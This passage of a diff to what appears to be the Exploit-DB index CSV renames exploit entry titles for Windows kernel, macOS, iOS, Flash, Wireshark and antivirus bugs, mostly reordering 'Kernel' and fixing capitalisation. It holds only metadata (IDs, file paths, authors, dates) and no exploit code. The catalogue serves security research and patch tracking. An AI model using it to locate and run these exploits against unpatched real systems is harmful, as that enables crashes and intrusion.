Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38268,platforms/win_x86/dos/38268.txt,"Microsoft Windows - Kernel Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38269,platforms/win_x86/dos/38269.txt,"Microsoft Windows - Kernel HmgAllocateObjectAttr Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38270,platforms/win_x86/dos/38270.txt,"Microsoft Windows - Kernel win32k!vSolidFillRect Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38271,platforms/win_x86/dos/38271.txt,"Microsoft Windows - Kernel SURFOBJ Null Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38272,platforms/windows/dos/38272.txt,"Microsoft Windows - Kernel Brush Object Use-After-Free (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0 -38273,platforms/win_x86/dos/38273.txt,"Microsoft Windows - Kernel WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38274,platforms/win_x86/dos/38274.txt,"Microsoft Windows - Kernel Null Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38275,platforms/win_x86/dos/38275.txt,"Microsoft Windows - Kernel Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38276,platforms/win_x86/dos/38276.txt,"Microsoft Windows - Kernel FlashWindowEx​ Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38277,platforms/win_x86/dos/38277.txt,"Microsoft Windows - Kernel bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38278,platforms/win_x86/dos/38278.txt,"Microsoft Windows - Kernel Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38279,platforms/win_x86/dos/38279.txt,"Microsoft Windows - Kernel Use-After-Free with Printer Device Contexts (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38280,platforms/win_x86/dos/38280.txt,"Microsoft Windows - Kernel NtGdiStretchBlt Pool Buffer Overflows (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38265,platforms/win_x86/dos/38265.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38266,platforms/win_x86/dos/38266.txt,"Microsoft Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38267,platforms/win_x86/dos/38267.txt,"Microsoft Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38268,platforms/win_x86/dos/38268.txt,"Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38269,platforms/win_x86/dos/38269.txt,"Microsoft Windows Kernel - HmgAllocateObjectAttr Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38270,platforms/win_x86/dos/38270.txt,"Microsoft Windows Kernel - win32k!vSolidFillRect Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38271,platforms/win_x86/dos/38271.txt,"Microsoft Windows Kernel - SURFOBJ Null Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38272,platforms/windows/dos/38272.txt,"Microsoft Windows Kernel - Brush Object Use-After-Free (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0 +38273,platforms/win_x86/dos/38273.txt,"Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38274,platforms/win_x86/dos/38274.txt,"Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38275,platforms/win_x86/dos/38275.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38276,platforms/win_x86/dos/38276.txt,"Microsoft Windows Kernel - FlashWindowEx​ Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38277,platforms/win_x86/dos/38277.txt,"Microsoft Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38278,platforms/win_x86/dos/38278.txt,"Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38279,platforms/win_x86/dos/38279.txt,"Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38280,platforms/win_x86/dos/38280.txt,"Microsoft Windows Kernel - NtGdiStretchBlt Pool Buffer Overflows (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 38281,platforms/windows/dos/38281.txt,"Kaspersky AntiVirus - VB6 Parsing Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 38282,platforms/windows/dos/38282.txt,"Kaspersky AntiVirus - ExeCryptor Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 38283,platforms/windows/dos/38283.txt,"Kaspersky AntiVirus - PE Unpacking Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 @@ -4742,7 +4741,7 @@ id,file,description,date,author,platform,type,port 38285,platforms/windows/dos/38285.txt,"Kaspersky AntiVirus - CHM Parsing Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,dos,0 38286,platforms/windows/dos/38286.txt,"Kaspersky AntiVirus - UPX Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 38288,platforms/windows/dos/38288.txt,"Kaspersky AntiVirus - Yoda's Protector Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 -38307,platforms/win_x86/dos/38307.txt,"Microsoft Windows - Kernel NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 +38307,platforms/win_x86/dos/38307.txt,"Microsoft Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - '.qfl' Crash (PoC)",2015-09-25,Un_N0n,windows,dos,0 38336,platforms/windows/dos/38336.py,"Git 1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0 38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",ios,dos,0 @@ -4750,7 +4749,7 @@ id,file,description,date,author,platform,type,port 38348,platforms/windows/dos/38348.txt,"Adobe Flash - No Checks on Vector. Capacity Field",2015-09-28,"Google Security Research",windows,dos,0 38364,platforms/multiple/dos/38364.txt,"Varnish Cache - Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0 38365,platforms/linux/dos/38365.txt,"Squid - 'httpMakeVaryMark()' Function Remote Denial of Service",2013-03-05,tytusromekiatomek,linux,dos,0 -38392,platforms/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial Of Service",2013-03-07,"Alyssa Milburn",linux,dos,0 +38392,platforms/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial of Service",2013-03-07,"Alyssa Milburn",linux,dos,0 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 @@ -4791,7 +4790,7 @@ id,file,description,date,author,platform,type,port 38623,platforms/multiple/dos/38623.html,"RealNetworks RealPlayer - Denial of Service",2013-07-02,"Akshaysinh Vaghela",multiple,dos,0 38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,multiple,dos,0 38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash (PoC)",2015-11-07,"Luis Martínez",windows,dos,0 -39374,platforms/osx/dos/39374.c,"Apple Mac OSX - Kernel IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39374,platforms/osx/dos/39374.c,"Apple Mac OSX Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - Overwrite (SEH)",2015-11-09,Un_N0n,windows,dos,0 38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 @@ -4803,8 +4802,8 @@ id,file,description,date,author,platform,type,port 38705,platforms/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow (PoC)",2015-11-16,"Nipun Jaswal",windows,dos,0 38710,platforms/windows/dos/38710.py,"foobar2000 1.3.9 - '.pls' / '.m3u' / '.m3u8' Local Crash (PoC)",2015-11-16,"Antonio Z.",windows,dos,0 38711,platforms/windows/dos/38711.py,"foobar2000 1.3.9 - '.asx' Local Crash (PoC)",2015-11-16,"Antonio Z.",windows,dos,0 -38713,platforms/windows/dos/38713.txt,"Microsoft Windows - Kernel 'win32k.sys' Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 -38714,platforms/windows/dos/38714.txt,"Microsoft Windows - Kernel 'win32k.sys' Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 +38713,platforms/windows/dos/38713.txt,"Microsoft Windows Kernel - 'win32k.sys' Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 +38714,platforms/windows/dos/38714.txt,"Microsoft Windows Kernel - 'win32k.sys' Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 38734,platforms/windows/dos/38734.txt,"Kaspersky AntiVirus - Certificate Handling Directory Traversal",2015-11-16,"Google Security Research",windows,dos,0 38735,platforms/windows/dos/38735.txt,"Kaspersky AntiVirus - DEX File Format Memory Corruption",2015-11-16,"Google Security Research",windows,dos,0 38736,platforms/windows/dos/38736.txt,"Kaspersky AntiVirus - '.ZIP' File Format Use-After-Free",2015-11-16,"Google Security Research",windows,dos,0 @@ -4815,7 +4814,7 @@ id,file,description,date,author,platform,type,port 38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash (PoC)",2015-11-19,"Vivek Mahajan",windows,dos,0 38763,platforms/lin_x86/dos/38763.txt,"Google Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 38771,platforms/windows/dos/38771.py,"ShareKM - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 -38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial Of Service",2013-09-23,anonymous,linux,dos,0 +38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial of Service",2013-09-23,anonymous,linux,dos,0 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0 38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - '.PDF' Parsing Memory Corruption",2015-11-23,"Francis Provencher",windows,dos,0 38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (1)",2015-11-23,"Francis Provencher",windows,dos,0 @@ -4824,7 +4823,7 @@ id,file,description,date,author,platform,type,port 38793,platforms/windows/dos/38793.txt,"Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0 38794,platforms/windows/dos/38794.txt,"Microsoft Windows Cursor - Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38795,platforms/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 -38796,platforms/windows/dos/38796.txt,"Microsoft Windows - Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 +38796,platforms/windows/dos/38796.txt,"Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 38854,platforms/linux/dos/38854.sh,"Net-SNMP - SNMPD AgentX Subagent Timeout Denial of Service",2012-09-05,"Ken Farnen",linux,dos,0 38857,platforms/linux/dos/38857.txt,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",linux,dos,0 @@ -4915,7 +4914,7 @@ id,file,description,date,author,platform,type,port 39181,platforms/windows/dos/39181.py,"Intel Indeo - Video Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos,0 39182,platforms/multiple/dos/39182.py,"RealPlayer - '.3gp' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",multiple,dos,0 39183,platforms/windows/dos/39183.py,"ALLPlayer - '.wav' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos,0 -39373,platforms/osx/dos/39373.c,"Apple Mac OSX - Kernel no-more-senders Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39373,platforms/osx/dos/39373.c,"Apple Mac OSX Kernel - no-more-senders Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39208,platforms/windows/dos/39208.c,"Microsoft Windows - Touch Injection API Local Denial of Service",2014-05-22,"Tavis Ormandy",windows,dos,0 39216,platforms/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash (PoC)",2016-01-11,"Mohammad Reza Espargham",windows,dos,0 39219,platforms/multiple/dos/39219.txt,"Adobe Flash BlurFilter Processing - Out-of-Bounds Memset",2016-01-11,"Google Security Research",multiple,dos,0 @@ -4930,7 +4929,7 @@ id,file,description,date,author,platform,type,port 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos,0 -39375,platforms/osx/dos/39375.c,"Apple Mac OSX - Kernel IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39375,platforms/osx/dos/39375.c,"Apple Mac OSX Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39308,platforms/linux/dos/39308.c,"Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0 39315,platforms/hardware/dos/39315.pl,"Multiple Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service",2014-09-15,"Federick Joe P Fajardo",hardware,dos,0 39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 @@ -4942,7 +4941,7 @@ id,file,description,date,author,platform,type,port 39327,platforms/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39329,platforms/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0 39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - '.PDF' Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 -39331,platforms/windows/dos/39331.pl,"TFTPD32 / Tftpd64 - Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 +39331,platforms/windows/dos/39331.pl,"TFTPD32 / Tftpd64 - Denial of Service",2014-05-14,j0s3h4x0r,windows,dos,0 39353,platforms/windows/dos/39353.txt,"VideoLAN VLC Media Player 2.2.1 - '.mp4' Heap Memory Corruption",2016-01-28,"Francis Provencher",windows,dos,0 39357,platforms/osx/dos/39357.txt,"Apple Mac OSX / iOS - Unsandboxable Kernel Code Exection Due to iokit Double Release in IOKit",2016-01-28,"Google Security Research",osx,dos,0 39358,platforms/multiple/dos/39358.txt,"Apple Mac OSX / iOS - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 @@ -4952,12 +4951,12 @@ id,file,description,date,author,platform,type,port 39362,platforms/ios/dos/39362.txt,"iOS Kernel - AppleOscarCMA Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39363,platforms/ios/dos/39363.txt,"iOS Kernel - IOHIDEventService Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39364,platforms/ios/dos/39364.txt,"iOS Kernel - IOReportHub Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 -39365,platforms/multiple/dos/39365.c,"Apple Mac OSX / iOS - Kernel IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 -39366,platforms/multiple/dos/39366.c,"Apple Mac OSX / iOS - Kernel iokit Registry Iterator Manipulation Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 +39365,platforms/multiple/dos/39365.c,"Apple Mac OSX / iOS Kernel - IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 +39366,platforms/multiple/dos/39366.c,"Apple Mac OSX / iOS Kernel - iokit Registry Iterator Manipulation Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 39367,platforms/osx/dos/39367.c,"Apple Mac OSX - io_service_close Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39368,platforms/osx/dos/39368.c,"Apple Mac OSX - gst_configure Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0 39369,platforms/osx/dos/39369.c,"Apple Mac OSX - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 -39370,platforms/osx/dos/39370.c,"Apple Mac OSX - Kernel Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39370,platforms/osx/dos/39370.c,"Apple Mac OSX Kernel - Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39376,platforms/osx/dos/39376.c,"Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 39377,platforms/multiple/dos/39377.c,"Apple Mac OSX / iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0 39378,platforms/multiple/dos/39378.c,"Apple Mac OSX / iOS - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",multiple,dos,0 @@ -5034,8 +5033,8 @@ id,file,description,date,author,platform,type,port 39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow Denial of Service",2016-03-14,INSECT.B,windows,dos,0 -39560,platforms/windows/dos/39560.txt,"Microsoft Windows - Kernel 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 -39561,platforms/windows/dos/39561.txt,"Microsoft Windows - Kernel 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 +39560,platforms/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 +39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 @@ -5046,16 +5045,16 @@ id,file,description,date,author,platform,type,port 39604,platforms/multiple/dos/39604.txt,"Wireshark - dissect_ber_integer Static Out-of-Bounds Write",2016-03-23,"Google Security Research",multiple,dos,0 39605,platforms/windows/dos/39605.txt,"Comodo - Integer Overflow Leading to Heap Overflow in Win32 Emulation",2016-03-23,"Google Security Research",windows,dos,0 39606,platforms/windows/dos/39606.txt,"Comodo AntiVirus - Heap Overflow in LZX Decompression",2016-03-23,"Google Security Research",windows,dos,0 -39607,platforms/osx/dos/39607.c,"Apple Mac OSX - Kernel Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort",2016-03-23,"Google Security Research",osx,dos,0 +39607,platforms/osx/dos/39607.c,"Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort",2016-03-23,"Google Security Research",osx,dos,0 39608,platforms/windows/dos/39608.txt,"Adobe Flash - Shape Rendering Crash",2016-03-23,"Google Security Research",windows,dos,0 39609,platforms/windows/dos/39609.txt,"Adobe Flash - Zlib Codec Heap Overflow",2016-03-23,"Google Security Research",windows,dos,0 39610,platforms/windows/dos/39610.txt,"Adobe Flash - Sprite Creation Use-After-Free",2016-03-23,"Google Security Research",windows,dos,0 39611,platforms/windows/dos/39611.txt,"Adobe Flash - Uninitialized Stack Parameter Access in AsBroadcaster.broadcastMessage UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 39612,platforms/windows/dos/39612.txt,"Adobe Flash - Uninitialized Stack Parameter Access in Object.unwatch UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 39613,platforms/windows/dos/39613.txt,"Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 -39614,platforms/osx/dos/39614.c,"Apple Mac OSX - Kernel AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0 -39615,platforms/osx/dos/39615.c,"Apple Mac OSX - Kernel Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 -39616,platforms/osx/dos/39616.c,"Apple Mac OSX - Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 +39614,platforms/osx/dos/39614.c,"Apple Mac OSX Kernel - AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0 +39615,platforms/osx/dos/39615.c,"Apple Mac OSX Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 +39616,platforms/osx/dos/39616.c,"Apple Mac OSX Kernel - Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 39627,platforms/windows/dos/39627.py,"TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 39629,platforms/android/dos/39629.txt,"Android One - mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0 39633,platforms/multiple/dos/39633.txt,"Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1",2016-03-30,"Francis Provencher",multiple,dos,0 @@ -5063,8 +5062,8 @@ id,file,description,date,author,platform,type,port 39635,platforms/multiple/dos/39635.txt,"Apple QuickTime < 7.7.79.80.95 - PSD File Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos,0 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 -39647,platforms/windows/dos/39647.txt,"Microsoft Windows - Kernel Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 -39648,platforms/windows/dos/39648.txt,"Microsoft Windows - Kernel NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 +39647,platforms/windows/dos/39647.txt,"Microsoft Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 +39648,platforms/windows/dos/39648.txt,"Microsoft Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 39649,platforms/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39650,platforms/multiple/dos/39650.txt,"Adobe Flash - textfield.maxChars Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39651,platforms/android/dos/39651.txt,"Android - ih264d_process_intra_mb Memory Corruption",2016-04-01,"Google Security Research",android,dos,0 @@ -5078,11 +5077,11 @@ id,file,description,date,author,platform,type,port 39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0 39699,platforms/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos,0 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard-Coded Credentials",2016-04-18,DLY,hardware,dos,0 -39712,platforms/win_x86-64/dos/39712.txt,"Microsoft Windows - Kernel DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win_x86-64,dos,0 +39712,platforms/win_x86-64/dos/39712.txt,"Microsoft Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win_x86-64,dos,0 39713,platforms/windows/dos/39713.c,"Hyper-V - 'vmswitch.sys' VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash (PoC)",2016-04-25,"David Silveiro",linux,dos,0 39740,platforms/windows/dos/39740.cpp,"Microsoft Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0 -39743,platforms/windows/dos/39743.txt,"Microsoft Windows - Kernel 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0 +39743,platforms/windows/dos/39743.txt,"Microsoft Windows Kernel - 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0 39747,platforms/linux/dos/39747.py,"Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash",2016-04-29,"David Silveiro",linux,dos,0 39748,platforms/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow",2016-04-29,"Google Security Research",multiple,dos,0 39749,platforms/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos,0 @@ -5136,17 +5135,17 @@ id,file,description,date,author,platform,type,port 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0 39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Win/Mac) - Crash (PoC)",2016-06-09,halsten,multiple,dos,0 39915,platforms/windows/dos/39915.c,"Armadito Antimalware - Backdoor/Bypass",2016-06-10,Ax.,windows,dos,0 -39920,platforms/osx/dos/39920.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 